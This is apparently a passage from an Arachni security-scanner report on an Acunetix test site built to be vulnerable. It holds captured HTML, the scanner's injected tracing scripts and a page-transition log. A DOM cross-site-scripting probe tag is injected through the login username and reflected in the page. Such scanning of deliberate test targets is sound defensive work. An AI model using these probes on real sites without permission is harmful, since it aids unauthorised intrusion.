site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/"></div> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"xss_dom_0c25785427908905790d3a663dc49fa7":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> Welcome <b>admin<xss_dom_0c25785427908905790d3a663dc49fa7/></b> | <a href='/logout'>Logout</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html> |
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 9.163898 | load |
page
|
|
||
| 1 | 3.86217 | request |
http://testhtml5.vulnweb.com/ |
|
||
| 2 | 3.554117 | request |
http://testhtml5.vulnweb.com/static/app/services/itemsService.js |
|
||
| 3 | 0.30496 | request |
http://testhtml5.vulnweb.com/ajax/popular?offset=0 |
|
||
| 4 | 0.812222 | request |
http://testhtml5.vulnweb.com/static/app/partials/itemsList.html |
|
||
| 5 | 0.570796 | request |
http://testhtml5.vulnweb.com/static/scr/default.png |
|
||
| 6 | 0.800369 | click |
<a href="#/archive" data-arachni-id="916551842">
|
|
||
| 7 | 0.355032 | request |
http://testhtml5.vulnweb.com/static/app/partials/archive.html |
|
||
| 8 | 0.250829 | request |
http://testhtml5.vulnweb.com/ajax/archive |
|
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.4 Cache-Control: no-cache Pragma: no-cache Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,* Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:56:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
<a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 | <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="55824100"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal" data-arachni-id="73596745">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class=""><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li class="active"><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* 